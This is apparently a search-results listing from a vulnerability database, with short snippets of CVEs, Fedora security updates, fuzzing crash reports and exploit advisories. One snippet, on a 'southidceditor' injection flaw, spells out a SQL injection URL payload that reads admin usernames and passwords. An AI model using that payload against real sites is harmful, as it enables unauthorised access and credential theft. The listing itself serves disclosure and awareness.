11 matches found
OSV-2026-649 Container-overflow in OGRGeometryFactory::organizePolygons
OSS-Fuzz report: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=506932597 Crash type: Container-overflow WRITE 1 Crash state: OGRGeometryFactory::organizePolygons OGRCreateFromShapeBin OpenFileGDB::FileGDBOGRGeometryConverterImpl::CreateCurveGeometry...
[SECURITY] Fedora 44 Update: shotwell-33~alpha-9.fc44
Shotwell is an easy-to-use, fast photo organizer designed for the GNOME desktop. It allows you to import photos from your camera or disk, organize them by date and subject matter, even ratings. It also offers basic photo editing, like crop, red-eye correction, color adjustments, and straighten...
CVE-2024-26655
In the Linux kernel, the following vulnerability has been resolved: Fix memory leak in posix_clock_open. If the clk ops.open function returns an error, we don't release the pccontext we allocated for this clock. Re-organize the code slightly to make it all more obvious...
Fedora: Security Advisory for xml-commons-apis (FEDORA-2024-129d8ca6fc)
The remote host is missing an update for the...
New Year, New Threats: 4 Tips to Activate Your Best Cyber-Defense
As we enter into a new year full of uncertainty, one thing for cybersecurity practitioners remains true: You have a strategic advantage over adversaries. It may sound obvious to say, but they’re launching attacks against you, within your environment, which you control – giving you a fundamental...
SnipCommand 0.1.0 - XSS to Remote Command Execution Vulnerability
Exploit Title: SnipCommand 0.1.0 - XSS to RCE Exploit Author: TaurusOmar CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H Risk: High 8.8 Vendor Homepage: https://github.com/gurayyarar/SnipCommand Version: 0.1.0 Tested on: Windows, Linux, MacOs Software Description: Open source command snippets manage...
Snupps: Collect Organize Share - Customized SSL, Redefined SSL Common Names verifier, WebView code execution vulnerabilities
HackApp vulnerability scanner discovered that application Snupps: Collect Organize Share published at the 'play' market has multiple vulnerabilities...
Authentication flaw
The (1) reports API and (2) administration feature in the comments API in the Ushahidi Platform before 2.5 do not require authentication, which allows remote attackers to generate reports and organize comments via API functions...
Southern data editor (southidceditor) injection 0day vulnerabilities - vulnerability warning - the black bar safety net
Injection point: newssearch. asp? key=7%' union select 0,username%2BCHR1 2 4%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 It may be another version: newssearch. asp? key=7%' union select 0,username%2BCHR1 2 4%2Bpassword,2,3,4,5,6,7,8,9,1 0 from admin where 1...
Eventum Issue Tracking System 2.3.1 stored cross site scripting vulnerability - vulnerability warning - the black bar safety net
Eventum Issue Tracking System is a flexible bug tracking system with a user-friendly interface that can help a development team quickly organize tasks and bugs. Eventum Issue Tracking System 2.3.1 contains a stored cross site scripting vulnerability that could cause users to...
Wmshop 6.0 Password Disclosure
Cyber-Warrior & Security TIM - Bug Researchers Group Application Name : Wmshop 6.0 - 5.08 Vulnerable Type : Arbitrary Forum Password Disclosure Vulnerability Infection : Forum Password Get... Author : Septemb0x Script Down.& WebSite : http://s2.dosya.tc/wmshop6.0.rar.html -...